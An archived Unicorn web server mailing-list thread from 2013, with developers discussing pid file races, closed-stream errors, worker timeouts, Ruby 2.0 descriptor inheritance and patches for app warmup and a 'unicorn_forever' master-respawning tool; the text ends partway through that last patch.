OK.  I assume you do the same for nginx?
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* Re: pid file handling issue
  2013-10-24  2:03  3%     ` Eric Wong
@ 2013-10-24 17:51  0%       ` Michael Fischer
  2013-10-24 18:21  3%         ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Michael Fischer @ 2013-10-24 17:51 UTC (permalink / raw)
  To: unicorn list

On Wed, Oct 23, 2013 at 7:03 PM, Eric Wong <normalperson@yhbt.net> wrote:

>> > I read and stash the value of the pid file before issuing any USR2.
>> > Later, you can issue "kill -0 $old_pid" after sending SIGQUIT
>> > to ensure it's dead.
>>
>> That's inherently racy; another process can claim the old PID in the interim.
>
> Right, but raciness goes for anything regarding pid files.
>
> The OS does make an effort to avoid recycling PIDs too often,
> and going through all the PIDs in a system quickly is
> probably rare.  I haven't hit it, at least.

That's not good enough.

The fact that the pid file contains a pid is immaterial to me; I don't
even need to look at it.  I only care about when it was created, or
what its inode number is, so that I can detect whether Unicorn was
last successfully started or restarted.  rename(2) is atomic per POSIX
and is not subject to race conditions.

>> > Checking the mtime of the pidfile is really bizarre...
>>
>> Perhaps (though it's a normative criticism), but on the other hand, it
>> isn't subject to the race above.
>
> It's still racy in a different way, though (file could change right
> after checking).

If the file's mtime or inode number changes under my proposal, that
means the reload must have been successful.   What race condition are
you referring to that would render this conclusion inaccurate?

> Having the process start time in /proc be unreliable because the server
> has the wrong time is also in the same category of corner cases.

This is absolutely not true.  A significant minority, if not a
majority, of servers will have at least slightly inaccurate wall
clocks on boot.  This is usually corrected during boot by an NTP sync,
but by then the die has already been cast insofar as ps(1) output is
concerned.

> Also, can you check the inode of the /proc/$pid entry?  Perhaps

That's not portable.

> PID files are horrible, really :<

To reiterate, I'm not using the PID file in this instance to determine
Unicorn's PID.  It could be empty, for all I care.

--Michael
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: pid file handling issue
  @ 2013-10-24  2:03  3%     ` Eric Wong
  2013-10-24 17:51  0%       ` Michael Fischer
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2013-10-24  2:03 UTC (permalink / raw)
  To: unicorn list

Michael Fischer <mfischer@zendesk.com> wrote:
> On Wed, Oct 23, 2013 at 5:53 PM, Eric Wong <normalperson@yhbt.net> wrote:
> 
> > I read and stash the value of the pid file before issuing any USR2.
> > Later, you can issue "kill -0 $old_pid" after sending SIGQUIT
> > to ensure it's dead.
> 
> That's inherently racy; another process can claim the old PID in the interim.

Right, but raciness goes for anything regarding pid files.

The OS does make an effort to avoid recycling PIDs too often,
and going through all the PIDs in a system quickly is
probably rare.  I haven't hit it, at least.

> > Checking the mtime of the pidfile is really bizarre...
> 
> Perhaps (though it's a normative criticism), but on the other hand, it
> isn't subject to the race above.

It's still racy in a different way, though (file could change right
after checking).

> > OTOH, there's times when users accidentally remove a pid
> > file and regenerate by hand it from ps(1), too...
> 
> Sure, but (a) that's a corner case I'm not particularly concerned
> about, and (b) it wouldn't cause any problems, assuming the user did
> this before any reload attempt, and not in the middle or something.

Having the process start time in /proc be unreliable because the server
has the wrong time is also in the same category of corner cases.

Also, can you check the inode of the /proc/$pid entry?  Perhaps

PID files are horrible, really :<
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* Re: IOError: closed stream
  @ 2013-09-26 22:31  2% ` David Judd
  0 siblings, 0 replies; 200+ results
From: David Judd @ 2013-09-26 22:31 UTC (permalink / raw)
  To: mongrel-unicorn

>
> Do you have anything in your Rack app which does background processing
> of rack.input after the response is written?
> That would be the most likely explanation...

Not that I'm aware of, and I can't find any references to rack.input
in our codebase aside from the monkeypatch.

> If varnish is used, your nginx -> varnish -> unicorn is what I would
> recommend (not that I have much experience with varnish, but I when I
> last looked at them, nginx was better at handling slow/idle
> connections).
> That said, I'm not sure what could cause the increase in errors...
> Is varnish attempting to pre-connect?

I realized when I was seeing the errors en masse, I was actually just
running varnish->unicorn, no nginx--I hadn't finished the switch to
nginx->varnish->unicorn which we had planned.

> Can you reproduce this error on a minimal Rack app from a client
> you control?

I'll give it a shot when I have some time, but suspect it will be
tough. Even with the 'bad' setup, it's an infrequent error with
production traffic that's pretty high-volume.

I'll also (actually, probably sooner) actually try the configuration
of nginx->varnish->unicorn. If that works, or mostly works, I may not
be able to justify investing the time to dig into this further.

> For the mimimal rack test app, try just an unpatched Rack,
> there could be a subtle compatibility problems from the monkey patch.
> The basic idea is to eliminate variables and strange/uncommon things to
> pinpoint the problem.

With an unpatched Rack, I get a NoMethodError due to
Rack::Request#POST returning nil. I think there's a one-to-one
correspondence between when one error would occur and when the other
would, but I can't confirm that - one started appearing as soon as the
other disappeared, at roughly the same rate. The seemingly relevant
commit (although the justification for the change doesn't seem
related): https://github.com/rack/rack/commit/b0593078ce792a380779528a6a135c066aa03515

Thanks,
David

On Tue, Sep 24, 2013 at 9:02 AM, David Judd <david@academia.edu> wrote:
> I'm getting "IOError: closed stream" from inside Unicorn occasionally
> and I don't know what to make of it. The stack trace looks like this:
>
> unicorn (4.5.0) lib/unicorn/stream_input.rb:129:in `kgio_read' unicorn
> (4.5.0) lib/unicorn/stream_input.rb:129:in `read_all' unicorn (4.5.0)
> lib/unicorn/stream_input.rb:60:in `read' unicorn (4.5.0)
> lib/unicorn/tee_input.rb:84:in `read'
> config/initializers/rack_request.rb:19:in `POST' rack (1.4.5)
> lib/rack/request.rb:221:in `params'
>
> Any suggestions what this might indicate? Is this what I should
> legitimately expect to see if the browser closes the connection
> abruptly?
>
> It's happening only for POSTs, and a small percentage of them, but I
> can't find any further pattern - a variety of content, usually quite
> small content-lengths.
>
> Currently we're running nginx in front of unicorn via a unix socket.
> In this state the errors occur at an almost-negligible rate. I
> experimented yesterday with moving instead to nginx in front of
> varnish, on a separate machine, with varnish then talking to unicorn
> via a TCP socket. In that configuration the errors increased
> dramatically, although the majority of requests still succeeded.
>
> As you can see we're running unicorn 4.5 and rack 1.4.5 - except that
> I'm monkey-patching Rack::Request to backport the 1.5 POST method,
> which transforms an earlier nil error in to this one. (On Ruby 2.0.0,
> on an Ubuntu-precise box on AWS.)
>
> Any relevant info or suggestions would be appreciated.
>
> Apologies if this shows up as a double-post--my first attempt seems to
> have been rejected because I didn't turn on plain text mode.
>
> Thanks,
> David
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 2%]

* Re: [PATCH] preload_app can take an optional block for warmup
  2013-09-21 23:10  0%   ` Aman Gupta
@ 2013-09-23 10:58  0%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-09-23 10:58 UTC (permalink / raw)
  To: Aman Gupta; +Cc: unicorn list

Aman Gupta <aman@tmm1.net> wrote:
> > In particular, what benefit does this have over putting the same
> > code in config.ru or config/initializer.rb (or similar?)
> 
> With my patch, preload_app yields a rack app object which includes the
> middleware stack. AFAIK there's no way to do this in the context of
> config.ru, since the app is still being built. My goal is to warm up
> the final application that will be serving traffic, including all
> middleware.

Good point.  Perhaps this can be triggered via Rack::Builder#to_app
instead, so it can benefit _all_ Rack HTTP servers.

Care to move this discussion over to rack-devel?

There's the odd non-Rack::Builder case, too, but I think everybody just
uses Rack::Builder via config.ru, right?
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: [PATCH] preload_app can take an optional block for warmup
  2013-09-21  8:49  3% ` Eric Wong
@ 2013-09-21 23:10  0%   ` Aman Gupta
  2013-09-23 10:58  0%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Aman Gupta @ 2013-09-21 23:10 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn list

> In particular, what benefit does this have over putting the same
> code in config.ru or config/initializer.rb (or similar?)

With my patch, preload_app yields a rack app object which includes the
middleware stack. AFAIK there's no way to do this in the context of
config.ru, since the app is still being built. My goal is to warm up
the final application that will be serving traffic, including all
middleware.

On Sat, Sep 21, 2013 at 1:49 AM, Eric Wong <normalperson@yhbt.net> wrote:
> Aman Gupta <aman@tmm1.net> wrote:
>
> Thanks for the patch!
>
> I expect a commit message body to describe why it is useful.
>
> In particular, what benefit does this have over putting the same
> code in config.ru or config/initializer.rb (or similar?)
>
> For user-visible config changes like these, it can be similar/identical
> to the added documentation.
>
> Anyways, I agree warming up the app is often necessary, but I'm not
> convinced it's necessary change unicorn for it.  It makes sense
> to warmup apps on servers other than unicorn, too.
>
>> --- a/lib/unicorn/http_server.rb
>> +++ b/lib/unicorn/http_server.rb
>> @@ -721,6 +721,9 @@ class Unicorn::HttpServer
>>          Gem.refresh
>>        end
>>        self.app = app.call
>> +      if preload_app.respond_to?(:call)
>> +        preload_app[app]
>> +      end
>
> Since you're testing for respond_to?(:call), it should be less confusing
> to use "preload_app.call(app)" here instead of "preload_app[app]"
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: [PATCH] preload_app can take an optional block for warmup
  @ 2013-09-21  8:49  3% ` Eric Wong
  2013-09-21 23:10  0%   ` Aman Gupta
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2013-09-21  8:49 UTC (permalink / raw)
  To: unicorn list; +Cc: Aman Gupta

Aman Gupta <aman@tmm1.net> wrote:

Thanks for the patch!

I expect a commit message body to describe why it is useful.

In particular, what benefit does this have over putting the same
code in config.ru or config/initializer.rb (or similar?)

For user-visible config changes like these, it can be similar/identical
to the added documentation.

Anyways, I agree warming up the app is often necessary, but I'm not
convinced it's necessary change unicorn for it.  It makes sense
to warmup apps on servers other than unicorn, too.

> --- a/lib/unicorn/http_server.rb
> +++ b/lib/unicorn/http_server.rb
> @@ -721,6 +721,9 @@ class Unicorn::HttpServer
>          Gem.refresh
>        end
>        self.app = app.call
> +      if preload_app.respond_to?(:call)
> +        preload_app[app]
> +      end

Since you're testing for respond_to?(:call), it should be less confusing
to use "preload_app.call(app)" here instead of "preload_app[app]"
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* Re: Ruby 2.0 Bad file descriptor (Errno::EBADF)
  2013-09-04 19:00  3%       ` Eric Chapweske
@ 2013-09-04 19:29  0%         ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-09-04 19:29 UTC (permalink / raw)
  To: unicorn list

Eric Chapweske <eac@zendesk.com> wrote:
> We ran into the same issue. For us, it was because we were executing the 
> process using bundle exec.  Bundler doesn't preserve the 1.9 behavior around
> FD inheritance. https://github.com/bundler/bundler/issues/2628

Thanks Eric!  I just pushed out the following and updated the website.

Subject: [PATCH] Sandbox: document SIGUSR2 + bundler issue with 2.0.0

Thanks to Eric Chapweske for the heads up.

ref: http://mid.gmane.org/loom.20130904T205308-432@post.gmane.org
---
 Sandbox | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/Sandbox b/Sandbox
index 1df149b..3c7f226 100644
--- a/Sandbox
+++ b/Sandbox
@@ -60,6 +60,13 @@ If you're using an older Bundler version (0.9.x), you may need to set or
 reset GEM_HOME, GEM_PATH and PATH environment variables in the
 before_exec hook as illustrated by http://gist.github.com/534668
 
+=== Ruby 2.0.0 close-on-exec and SIGUSR2 incompatibility
+
+Ruby 2.0.0 enforces FD_CLOEXEC on file descriptors by default.  unicorn
+has been prepared for this behavior since unicorn 4.1.0, but we forgot
+to remind the Bundler developers.  This issue is being tracked here:
+https://github.com/bundler/bundler/issues/2628
+
 == Isolate
 
 === Running
-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply related	[relevance 0%]

* Re: Ruby 2.0 Bad file descriptor (Errno::EBADF)
  @ 2013-09-04 19:00  3%       ` Eric Chapweske
  2013-09-04 19:29  0%         ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Eric Chapweske @ 2013-09-04 19:00 UTC (permalink / raw)
  To: mongrel-unicorn

Eric Wong <normalperson <at> yhbt.net> writes:

> OK, this is really strange; especially since you're only hitting this
> on your legacy app and not a new one.
> 
> I certainly haven't hit this with Ruby 2.0.0 anywhere (neither unicorn
> nor Rainbows!).  I'm fairly certain enough folks are using Ruby 2.0.0 by
> now that we would have more reports if something were amiss.
> 
> Let us know what you find, thanks!


We ran into the same issue. For us, it was because we were executing the 
process using bundle exec.  Bundler doesn't preserve the 1.9 behavior around
FD inheritance. https://github.com/bundler/bundler/issues/2628


_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* Re: A barrage of unexplained timeouts
  2013-08-20 18:49  0%         ` Eric Wong
@ 2013-08-20 20:03  0%           ` nick
  0 siblings, 0 replies; 200+ results
From: nick @ 2013-08-20 20:03 UTC (permalink / raw)
  To: unicorn list

"Eric Wong" <normalperson@yhbt.net> said:

> nick@auger.net wrote:
>> "Eric Wong" <normalperson@yhbt.net> said:
>> >
>> > Do you have any other requests in your logs which could be taking
>> > a long time and hogging workers, but not high enough to trigger the
>> > unicorn kill timeout.
> 
>> I don't *think* so.  Most requests finish <300ms.  We do have some
>> more intensive code-paths, but they're administrative and called much
>> less frequently.  Most of these pages complete in <3seconds.
>>
>> For requests that made it to rails logging, the LAST processed request
>> before the worker timed-out all completed very quickly (and no real
>> pattern in terms of which page may be triggering it.)
> 
> This is really strange.  This was only really bad for a 7s period?

It was a 7 minute period.  All of the workers would become busy and exceed their >120s timeout.  Master would kill and re-spawn them, they'd start to respond to a handful of requests (anywhere from 5-50) after which they'd become "busy" again, and get force killed by master.  This pattern happened 3 times over a 7 minute period.

> Has it happened again?

No

> Anything else going on with the system at that time?  Swapping, particularly...

No swap activity or high load.  Our munin graphs indicate a peak of web/app server disk latency around that time, although our graphs show many other similar peaks, without incident.

> And if you're inside a VM, maybe your neighbors were hogging things.
> Large PUT/POST requests which require filesystem I/O are particularly
> sensitive to this.

We can't blame virtualization as we're on dedicated hardware.

>> > Is this with Unix or TCP sockets?  If it's over a LAN, maybe there's
>> > still a bad switch/port/cable somewhere (that happens often to me).
>>
>> TCP sockets, with nginx and unicorn running on the same box.
> 
> OK, that probably rules out a bunch of problems.
> Just to be thorough, anything interesting in dmesg or syslogs?

Nothing interesting in /var/log/messages.  dmesg (no timestamps) includes lines like:

TCP: Treason uncloaked! Peer ###.###.###.###:63554/80 shrinks window 1149440448:1149447132. Repaired.

>> > With Unix sockets, I don't recall encountering recent problems under
>> > Linux.  Which OS are you running?
>>
>> Stock RHEL 5, kernel 2.6.18.
> 
> RHEL 5.0 or 5.x?  I can't remember /that/ far back to 5.0 (I don't think
> I even tried it until 5.2), but don't recall anything being obviously
> broken in those...

We're on RHEL 5.6.

Thanks,

-Nick

_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: A barrage of unexplained timeouts
  2013-08-20 18:11  3%       ` nick
@ 2013-08-20 18:49  0%         ` Eric Wong
  2013-08-20 20:03  0%           ` nick
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2013-08-20 18:49 UTC (permalink / raw)
  To: unicorn list

nick@auger.net wrote:
> "Eric Wong" <normalperson@yhbt.net> said:
> > 
> > Do you have any other requests in your logs which could be taking
> > a long time and hogging workers, but not high enough to trigger the
> > unicorn kill timeout.

> I don't *think* so.  Most requests finish <300ms.  We do have some
> more intensive code-paths, but they're administrative and called much
> less frequently.  Most of these pages complete in <3seconds.
> 
> For requests that made it to rails logging, the LAST processed request
> before the worker timed-out all completed very quickly (and no real
> pattern in terms of which page may be triggering it.)

This is really strange.  This was only really bad for a 7s period?
Has it happened again?  Anything else going on with the system at that
time?  Swapping, particularly...

And if you're inside a VM, maybe your neighbors were hogging things.
Large PUT/POST requests which require filesystem I/O are particularly
sensitive to this.

> > Is this with Unix or TCP sockets?  If it's over a LAN, maybe there's
> > still a bad switch/port/cable somewhere (that happens often to me).
> 
> TCP sockets, with nginx and unicorn running on the same box.

OK, that probably rules out a bunch of problems.
Just to be thorough, anything interesting in dmesg or syslogs?

> > With Unix sockets, I don't recall encountering recent problems under
> > Linux.  Which OS are you running?
> 
> Stock RHEL 5, kernel 2.6.18.

RHEL 5.0 or 5.x?  I can't remember /that/ far back to 5.0 (I don't think
I even tried it until 5.2), but don't recall anything being obviously
broken in those...
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: A barrage of unexplained timeouts
  @ 2013-08-20 18:11  3%       ` nick
  2013-08-20 18:49  0%         ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: nick @ 2013-08-20 18:11 UTC (permalink / raw)
  To: unicorn list

"Eric Wong" <normalperson@yhbt.net> said:
> nick@auger.net wrote:
>> "Eric Wong" <normalperson@yhbt.net> said:
>> > Can you take a look at the nginx error and access logs?  From what
>> > you're saying, there's a chance a request never even got to the Rails
>> > layer.  However, nginx should be logging failed/long-running requests to
>> > unicorn.
>>
>> The nginx access logs show frequent 499 responses.  The error logs are filled
>> with:
>>
>> connect() failed (110: Connection timed out) while connecting to upstream
>> upstream timed out (110: Connection timed out) while reading response header from
>> upstream
>>
>> What specific pieces of information should I be looking for in the logs?
> 
> Do you have any other requests in your logs which could be taking
> a long time and hogging workers, but not high enough to trigger the
> unicorn kill timeout.

I don't *think* so.  Most requests finish <300ms.  We do have some more intensive code-paths, but they're administrative and called much less frequently.  Most of these pages complete in <3seconds.

For requests that made it to rails logging, the LAST processed request before the worker timed-out all completed very quickly (and no real pattern in terms of which page may be triggering it.)

> (enable $request_time in nginx access logs if you haven't already)

I'll enable this.

> Is this with Unix or TCP sockets?  If it's over a LAN, maybe there's
> still a bad switch/port/cable somewhere (that happens often to me).

TCP sockets, with nginx and unicorn running on the same box.

> With Unix sockets, I don't recall encountering recent problems under
> Linux.  Which OS are you running?

Stock RHEL 5, kernel 2.6.18.

Thanks again,

-Nick



_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* [PATCH] unicorn_forever: new executable to respawn masters
@ 2013-07-24  3:11  1% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-07-24  3:11 UTC (permalink / raw)
  To: mongrel-unicorn

Comments/reports of success/failure appreciated.

(Bcc-ing the user who contacted me privately about daemontools :)
--------------------------------8<------------------------------
From: Eric Wong <normalperson@yhbt.net>
Subject: [PATCH] unicorn_forever: new executable to respawn masters

Warning: lightly tested (and not under daemontools/systemd/etc)

This may be useful for daemontools and similar init replacements
which behave badly when the master process is replaced during the
normal SIGUSR2 && SIGQUIT routine.

Usage:

  unicorn_forever EXISTING UNICORN COMMAND-LINE

Example:

  unicorn_forever unicorn -c /path/to/unicorn_config.rb config.ru

It can also be used to keep Rainbows! processes alive as long as
you check for "Rainbows!" constant references in your config file.

  unicorn_forever rainbows -c /path/to/rainbows_config.rb config.ru

Supported signals:

SIGKILL - really kill the unicorn_forever process (unblockable)

SIGSTOP - pause the process, this prevent unicorn_forever from detecting
          or respawning a dead master

SIGTSTP - same as SIGSTOP

SIGCONT - resumes a process stopped by SIGCONT

Those signals above were really implicit to everything, the following
two should be familiar to existing unicorn users.

SIGHUP  - reloads the config (just like regular unicorn).
          This does not touch the existing master process, but allows
	  future masters to be spawned with a different set of listen
	  sockets.

SIGUSR1 - reopens existing log files, this signal is forwarded to the
          regular unicorn master (and thus any workers it has)

All other normal unicorn signals are logged and otherwise ignored.
They are not forwarded to the unicorn master.

To upgrade a unicorn application, just send SIGQUIT (not SIGUSR2) to the
existing master and unicorn_forever will automatically respawn.

There is no way to gracefully upgrade unicorn_forever without losing
connections.  Doing graceful upgrades of unicorn_forever would defeat
the purpose and cause parents (e.g. daemontools) to notice a child
death.

unicorn_forever is probably unnecessary for systemd.  The use of cgroups
with systemd prevents daemons from "escaping" the control of systemd, so
a daemonized unicorn probably remains visible to systemd.

Implementation:

unicorn_forever is stripped down version of unicorn (and the
Unicorn::HttpServer class) which contains enough to:

* parse the config file for listeners (and general validation)
* bind listen sockets
* issue chdir for the working_directory
* set the UNICORN_FD environment variable
* exec the real process (unicorn/rainbows/whatever...)

It does not load nor validate the application.
---
 bin/unicorn_forever    | 126 +++++++++++++++++++++
 lib/unicorn/forever.rb | 289 +++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 415 insertions(+)
 create mode 100755 bin/unicorn_forever
 create mode 100644 lib/unicorn/forever.rb

diff --git a/bin/unicorn_forever b/bin/unicorn_forever
new file mode 100755
index 0000000..bef3a5f
--- /dev/null
+++ b/bin/unicorn_forever
@@ -0,0 +1,126 @@
+#!/this/will/be/overwritten/or/wrapped/anyways/do/not/worry/ruby
+# -*- encoding: binary -*-
+require 'unicorn'
+require 'unicorn/forever'
+require 'optparse'
+
+rackup_opts = Unicorn::Configurator::RACKUP
+options = rackup_opts[:options]
+
+op = OptionParser.new("", 24, '  ') do |opts|
+  cmd = File.basename($0)
+  opts.banner = "Usage: #{cmd} " \
+                "[ruby options] [#{cmd} options] [rackup config file]"
+  opts.separator "Ruby options:"
+
+  lineno = 1
+  opts.on("-e", "--eval LINE", "evaluate a LINE of code") do |line|
+    eval line, TOPLEVEL_BINDING, "-e", lineno
+    lineno += 1
+  end
+
+  opts.on("-d", "--debug", "set debugging flags (set $DEBUG to true)") do
+    $DEBUG = true
+  end
+
+  opts.on("-w", "--warn", "turn warnings on for your script") do
+    $-w = true
+  end
+
+  opts.on("-I", "--include PATH",
+          "specify $LOAD_PATH (may be used more than once)") do |path|
+    $LOAD_PATH.unshift(*path.split(/:/))
+  end
+
+  opts.on("-r", "--require LIBRARY",
+          "require the library, before executing your script") do |library|
+    require library
+  end
+
+  opts.separator "#{cmd} options:"
+
+  # some of these switches exist for rackup command-line compatibility,
+
+  opts.on("-o", "--host HOST",
+          "listen on HOST (default: #{Unicorn::Const::DEFAULT_HOST})") do |h|
+    rackup_opts[:host] = h
+    rackup_opts[:set_listener] = true
+  end
+
+  opts.on("-p", "--port PORT",
+          "use PORT (default: #{Unicorn::Const::DEFAULT_PORT})") do |p|
+    rackup_opts[:port] = p.to_i
+    rackup_opts[:set_listener] = true
+  end
+
+  opts.on("-E", "--env RACK_ENV",
+          "use RACK_ENV for defaults (default: development)") do |e|
+    ENV["RACK_ENV"] = e
+  end
+
+  opts.on("-N", "--no-default-middleware",
+          "do not load middleware implied by RACK_ENV") do |e|
+    rackup_opts[:no_default_middleware] = true
+  end
+
+  opts.on("-D", "--daemonize", "run daemonized in the background") do |d|
+    rackup_opts[:daemonize] = !!d
+  end
+
+  opts.on("-P", "--pid FILE", "DEPRECATED") do |f|
+    warn %q{Use of --pid/-P is strongly discouraged}
+    warn %q{Use the 'pid' directive in the Unicorn config file instead}
+    options[:pid] = f
+  end
+
+  opts.on("-s", "--server SERVER",
+          "this flag only exists for compatibility") do |s|
+    warn "-s/--server only exists for compatibility with rackup"
+  end
+
+  # Unicorn-specific stuff
+  opts.on("-l", "--listen {HOST:PORT|PATH}",
+          "listen on HOST:PORT or PATH",
+          "this may be specified multiple times",
+          "(default: #{Unicorn::Const::DEFAULT_LISTEN})") do |address|
+    options[:listeners] << address
+  end
+
+  opts.on("-c", "--config-file FILE", "Unicorn-specific config file") do |f|
+    options[:config_file] = f
+  end
+
+  # I'm avoiding Unicorn-specific config options on the command-line.
+  # IMNSHO, config options on the command-line are redundant given
+  # config files and make things unnecessarily complicated with multiple
+  # places to look for a config option.
+
+  opts.separator "Common options:"
+
+  opts.on_tail("-h", "--help", "Show this message") do
+    puts opts.to_s.gsub(/^.*DEPRECATED.*$/s, '')
+    exit
+  end
+
+  opts.on_tail("-v", "--version", "Show version") do
+    puts "#{cmd} v#{Unicorn::Const::UNICORN_VERSION}"
+    exit
+  end
+
+  opts.parse! ARGV
+end
+
+# ARGV[0] is usually "unicorn", but "unicorn_rails" or custom
+# BYOE wrappers work, too
+ru = ARGV[1] || 'config.ru'
+Unicorn::Configurator::RACKUP.merge!(:file => ru, :optparse => op)
+op = nil
+
+if $DEBUG
+  require 'pp'
+  pp({
+    :unicorn_options => options,
+    :daemonize => rackup_opts[:daemonize],
+  })
+end
+Unicorn::Forever.new(options).start.join
diff --git a/lib/unicorn/forever.rb b/lib/unicorn/forever.rb
new file mode 100644
index 0000000..3f6c5fe
--- /dev/null
+++ b/lib/unicorn/forever.rb
@@ -0,0 +1,289 @@
+# -*- encoding: binary -*-
+#
+# Normally the unicorn master process can handle all the restarting,
+# however with init replacements becoming process managers, we may want
+# to use something which never dies and restarts the master.
+class Unicorn::Forever
+  # :stopdoc:
+  include Unicorn::SocketHelper
+
+  attr_accessor :listener_opts, :init_listeners, :config, :logger
+
+  START_CTX = {
+    :argv => ARGV.map { |arg| arg.dup },
+  }
+
+  # We favor ENV['PWD'] since it is (usually) symlink aware for Capistrano
+  # and like systems
+  START_CTX[:cwd] = begin
+    a = File.stat(pwd = ENV['PWD'])
+    b = File.stat(Dir.pwd)
+    a.ino == b.ino && a.dev == b.dev ? pwd : Dir.pwd
+  rescue
+    Dir.pwd
+  end
+
+  def initialize(options = {})
+    @listeners = []
+    @self_pipe = []
+    @new_listeners = []
+    @init_listeners = options[:listeners] ? options[:listeners].dup : []
+    options[:use_defaults] = true
+    @config = Unicorn::Configurator.new(options)
+    @listener_opts = {}
+    @config.commit!(self, :skip => [:listeners])
+    @respawn = true
+    @self_pipe = Kgio::Pipe.new
+    @self_pipe.each { |io| io.fcntl(Fcntl::F_SETFD, Fcntl::FD_CLOEXEC) }
+    # signal queue used for self-piping
+    @sig_queue = []
+  end
+
+  def setup_sighandlers
+    %w(CHLD HUP QUIT TERM INT USR1 USR2 TTIN TTOU WINCH).each do |s|
+      trap(s) { sig_handler(s.to_sym) }
+    end
+  end
+
+  # Runs the thing.  Returns self so you can run join on it
+  def start
+    # no inheriting, just start the default if needed
+    config_listeners = @config[:listeners].dup
+    if config_listeners.empty?
+      config_listeners << Unicorn::Const::DEFAULT_LISTEN
+      @init_listeners << Unicorn::Const::DEFAULT_LISTEN
+      START_CTX[:argv] << "-l#{Unicorn::Const::DEFAULT_LISTEN}"
+    end
+    @new_listeners.replace(config_listeners)
+
+    bind_new_listeners!
+    setup_sighandlers
+    do_exec
+    self
+  end
+
+  # replaces current listener set with +listeners+.  This will
+  # close the socket if it will not exist in the new listener set
+  def listeners=(listeners)
+    cur_names, dead_names = [], []
+    listener_names.each do |name|
+      if ?/ == name[0]
+        # mark unlinked sockets as dead so we can rebind them
+        (File.socket?(name) ? cur_names : dead_names) << name
+      else
+        cur_names << name
+      end
+    end
+    set_names = listener_names(listeners)
+    dead_names.concat(cur_names - set_names).uniq!
+
+    @listeners.delete_if do |io|
+      if dead_names.include?(sock_name(io))
+        IO_PURGATORY.delete_if do |pio|
+          pio.fileno == io.fileno && (pio.close rescue nil).nil? # true
+        end
+        (io.close rescue nil).nil? # true
+      else
+        set_server_sockopt(io, listener_opts[sock_name(io)])
+        false
+      end
+    end
+
+    (set_names - cur_names).each { |addr| listen(addr) }
+  end
+
+  def stdout_path=(path); redirect_io($stdout, path); end
+  def stderr_path=(path); redirect_io($stderr, path); end
+
+  # for Configurator compatibility:
+  def noop(arg = nil); end
+  alias client_body_buffer_size= noop
+  alias client_body_buffer_size noop
+  alias check_client_connection= noop
+  alias check_client_connection noop
+  alias pid= noop
+  alias pid noop
+  alias preload_app= noop
+  alias preload_app noop
+  alias timeout= noop
+  alias timeout noop
+  alias trust_x_forwarded= noop
+  alias trust_x_forwarded noop
+  alias rewindable_input= noop
+  alias rewindable_input noop
+  alias worker_processes= noop
+  alias worker_processes noop
+  alias after_fork= noop
+  alias after_fork noop
+  alias before_fork= noop
+  alias before_fork noop
+  alias before_exec= noop
+  alias before_exec noop
+
+  # add a given address to the +listeners+ set, idempotently
+  # Allows workers to add a private, per-process listener via the
+  # after_fork hook.  Very useful for debugging and testing.
+  # +:tries+ may be specified as an option for the number of times
+  # to retry, and +:delay+ may be specified as the time in seconds
+  # to delay between retries.
+  # A negative value for +:tries+ indicates the listen will be
+  # retried indefinitely, this is useful when workers belonging to
+  # different masters are spawned during a transparent upgrade.
+  def listen(address, opt = {}.merge(listener_opts[address] || {}))
+    address = config.expand_addr(address)
+    return if String === address && listener_names.include?(address)
+
+    delay = opt[:delay] || 0.5
+    tries = opt[:tries] || 5
+    begin
+      io = bind_listen(address, opt)
+      unless Kgio::TCPServer === io || Kgio::UNIXServer === io
